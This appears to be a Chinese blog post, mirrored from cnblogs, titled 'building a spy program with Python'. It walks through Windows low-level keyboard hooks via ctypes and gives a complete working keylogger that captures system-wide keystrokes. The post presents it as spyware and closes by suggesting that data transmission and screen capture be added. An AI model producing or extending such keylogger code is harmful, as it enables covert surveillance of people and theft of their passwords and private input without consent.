zoukankan      html  css  js  c++  java
  • 使用Python打造一款间谍程序

    知识点

    这次我们使用python来打造一款间谍程序

    程序中会用到许多知识点,大致分为四块

      win32API  此处可以在MSDN上查看

      Python基础重点在cpytes库的使用,使用方法请点击此处

      C语言基础

      Hook

    程序的基本原理在于通过注册Hook,记录系统事件

    那么什么是Hook呢

    Hook 技术又叫做钩子函数,系统在调用函数之前,钩子程序就先捕获该消息,钩子函数先得到控制权,这时钩子函数既可以加工处理(改变)该函数的执行行为,还可以强制结束消息的传递

    注册Hook时我们需要先导入DLL库,在Python中我们使用ctypes来导入,导入方法如下

    user32 = CDLL("user32.dll")
    kernel32 = CDLL("kernel32.dll")

    我们导入了user32.dll和kernel32.dll

    这两个DLL有什么用处呢

      user32.dll     是Windows用户界面相关应用程序接口,用于包括Windows处理,基本用户界面等特性,如创建窗口和发送消息

      kernel32.dll  控制着系统的内存管理、数据的输入输出操作和中断处理

    流程部分

    知道了我们要使用什么样的工具,那么第一步应该怎么做呢

    1.首先我们需要先注册Hook到系统上,通过user32.dll中的SetWindowsHookExA函数,我们可以在系统上注册钩子

    HHOOK SetWindowsHookExA(
      int       idHook,
      HOOKPROC  lpfn,
      HINSTANCE hmod,
      DWORD     dwThreadId
    );

    通过查看文档我们看到SetWindowsHookExA函数的参数及参数类型如上所示,详细文档点击此链接查看

    通过文档我们看到第一个参数idHook中填入钩子的类型

    WH_KEYBOARD_LL的常量值为13代表的意思是监视低级键盘输入事件,我们此处来监听键盘事件

    第二个参数lpfn代表指向钩子过程的指针,要填入钩子过程(函数),我们可以在此处来添加额外代码达到我们想要达成的目的

    第三个参数hmod表示为DLL句柄,我们可以使用kernel32中的GetModuleHandleW来获取句柄

    最后一个参数dwThreadId我们填入0代表与同一桌面上所有的线程关联

    代码如下

    user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

    如何使用Python来编写我们的钩子过程呢,通过ctypes文档我们可以得知windows下使用WINFUNCTYPE来创建函数

    此时我们发现有WINFUNCTYPE和CFUNCTYPE两个函数,具体要使用哪一个呢,这两个的区别为

      WINFUNCTYPE  为Windows下独有的,通过使用使用stdcall调用约定的函数

      CFUNCTYPE   使用标准C调用约定的函数

    HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))

    因为我们调用的是WH_KEYBOARD_LL,WH_KEYBOARD_LL会使用LowLevelKeyboardProc回调函数,同时我们也需要在Python定义它

    LowLevelKeyboardProc数据结构如下

    LRESULT CALLBACK LowLevelKeyboardProc(
      _In_ int    nCode,
      _In_ WPARAM wParam,
      _In_ LPARAM lParam
    );

    按照官方文档提示 如果nCode小于零,则挂钩过程必须将消息传递给CallNextHookEx函数,而无需进一步处理,并且应返回CallNextHookEx返回的值

    我们转换为Python代码

    class KBDLLHOOKSTRUCT(Structure):
        _fields_ = [
            ('vkCode', DWORD),
            ('scanCode', DWORD),
            ('flags', DWORD),
            ('time', DWORD),
            ('dwExtraInfo', DWORD)]
    
    def hookProc(nCode, wParam, lParam):
        if nCode < 0:
            return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
        else:
    # 此处插入我们的代码
    pass return user32.CallNextHookEx(hooked, nCode, wParam, lParam)

    最后在我们退出程序时还需要删除Hook,不然大量的Hook会使系统运行缓慢,虽然在Windows 7及更高版本上,该钩子会被静默删除而不被调用。应用程序无法知道挂钩是否已删除。我们还是主动进行删除

    删除需要使用user32.dllUnhookWindowsHookEx,参数为Hook句柄

    user32.UnhookWindowsHookEx(hooked)

    下面贴上全部代码

     1 import sys
     2 from ctypes import *
     3 from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM
     4 
     5 user32 = CDLL("user32.dll")
     6 kernel32 = CDLL("kernel32.dll")
     7 
     8 
     9 class KBDLLHOOKSTRUCT(Structure):
    10     _fields_ = [
    11         ('vkCode', DWORD),
    12         ('scanCode', DWORD),
    13         ('flags', DWORD),
    14         ('time', DWORD),
    15         ('dwExtraInfo', DWORD)]
    16 
    17 
    18 def uninstallHookProc(hooked):
    19     if hooked is None:
    20         return
    21     user32.UnhookWindowsHookEx(hooked)
    22     hooked = None
    23 
    24 
    25 def hookProc(nCode, wParam, lParam):
    26     if nCode < 0:
    27         return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
    28     else:
    29         if wParam == 256:
    30             if 162 == lParam.contents.value:
    31                 print("Ctrl pressed, call Hook uninstall()")
    32                 uninstallHookProc(hooked)
    33                 sys.exit(-1)
    34             capsLock = user32.GetKeyState(20)
    35             # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT))
    36             if lParam.contents.value==13:
    37                 print("
    ")
    38             elif capsLock:
    39                 print(chr(lParam.contents.value),end="")
    40             else:
    41                 print(chr(lParam.contents.value+32),end="")
    42     return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
    43 
    44 
    45 def startKeyLog():
    46     msg = MSG()
    47     user32.GetMessageA(byref(msg), 0, 0, 0)
    48 
    49 
    50 def installHookProc(hooked, pointer):
    51     hooked = user32.SetWindowsHookExA(
    52         13,
    53         pointer,
    54         kernel32.GetModuleHandleW(),
    55         0
    56     )
    57     if not hooked:
    58         return False
    59     return True
    60 
    61 
    62 HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
    63 pointer = HOOKPROC(hookProc)
    64 hooked = None
    65 if installHookProc(hooked, pointer):
    66     print("Hook installed")
    67     try:
    68         msg = MSG()
    69         user32.GetMessageA(byref(msg), 0, 0, 0)
    70     except KeyboardInterrupt as kerror:
    71         uninstallHookProc(hooked)
    72         print("Hook uninstall...")
    73 else:
    74     print("Hook installed error")

    贴上我们的效果图

    我们还可以再添加上额外的代码比如数据传输,截屏等等  ^_^

    如何想要了解更多的只是请点击这里把  => 地址

    转载请附上原文出处链接及本声明

  • 相关阅读:
    一个星期自动态的网站设计
    java特权制度设计篇
    mac默认截图、截图代码
    NSDateFormatter
    vlan 以及 Linux实现的IEEE 802.1Q VLAN
    gtk+blade+anjuta 的简单实例
    NetBSD是个开源到源码的系统
    创作gtk源码级vim帮助文档 tags
    linux 怎么使用一个c/c++库
    linux 终端控制-- 多彩输出 格式排版
  • 原文地址:https://www.cnblogs.com/lonenysky/p/12341074.html
Copyright © 2011-2022 走看看